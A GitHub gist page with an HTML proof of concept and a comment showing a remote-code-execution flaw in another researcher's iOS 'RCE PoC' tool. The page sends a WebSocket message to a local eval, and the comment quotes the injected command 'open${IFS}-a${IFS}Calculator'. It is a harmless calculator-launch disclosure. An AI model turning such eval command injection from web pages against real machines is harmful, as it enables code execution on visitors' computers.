Skip to content

Instantly share code, notes, and snippets.

Last active Jan 31, 2022
What would you like to do?
An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1
<!doctype html>
<html lang="en" class="h-100">
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Bootstrap CSS -->
<link href="" rel="stylesheet" crossorigin="anonymous">
<title>RCE for the RCE</title>
* Globals
.bd-placeholder-img {
font-size: 1.125rem;
text-anchor: middle;
-webkit-user-select: none;
-moz-user-select: none;
user-select: none;
@media (min-width: 768px) {
.bd-placeholder-img-lg {
font-size: 3.5rem;
* Globals
/* Custom default button */
.btn-secondary:focus {
color: #333;
text-shadow: none; /* Prevent inheritance from `body` */
* Base structure
body {
text-shadow: 0 .05rem .1rem rgba(0, 0, 0, .5);
box-shadow: inset 0 0 5rem rgba(0, 0, 0, .5);
.cover-container {
max-width: 42em;
* Header
.nav-masthead .nav-link {
padding: .25rem 0;
font-weight: 700;
color: rgba(255, 255, 255, .5);
background-color: transparent;
border-bottom: .25rem solid transparent;
.nav-masthead .nav-link:hover,
.nav-masthead .nav-link:focus {
border-bottom-color: rgba(255, 255, 255, .25);
.nav-masthead .nav-link + .nav-link {
margin-left: 1rem;
.nav-masthead .active {
color: #fff;
border-bottom-color: #fff;
<body class="d-flex h-100 text-center text-white bg-dark">
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="mb-auto">
<main class="px-3 text-end">
<h1 style="font-size: 90px; color:#0000;">MA</h1>
<h1 style="font-size: 80px">Matt Austin</h1>
<p class="lead" style="color:#d0e4f8; font-size: 1.5em;">RCE for the "RCE" V1.0 PoC iOS 15.0.1 (By Jonathan Scott)</br>
Developed by <a href="" class="text-white">Matt Austin</a></p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary fw-bold border-white bg-white" onclick="send()">► Start</a>
<footer class="mt-auto text-white-50">
<p>© ®2021 Matt Austin by <a href="" class="text-white">@mattaustin</a>.</p>
let socket = new WebSocket("ws://");
socket.onopen = function(e) {
console.log("[open] Connection established");
console.log("Sending to server");
socket.onmessage = function(event) {
console.log(`[message] Data received from server: ${}`);
socket.onclose = function(event) {
console.log('[close] Connection died');
socket.onerror = function(error) {
console.log(`[error] ${error.message}`);
function send(){
Copy link

matt- commented Jan 3, 2022

@Hackdwerg Why not?

If you are running the fake RCE By Jonathan Scott from:
you can see that it calls an eval at:

If you view this page ( while running his exploit and click the button it makes a websocket call at to exploit the eval and runs open${IFS}-a${IFS}Calculator; open the calculator on macos.

If an attacker can create a website that executes code and makes system calls on your computer simply by viewing it I consider it an RCE. Can you explain why you don't?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment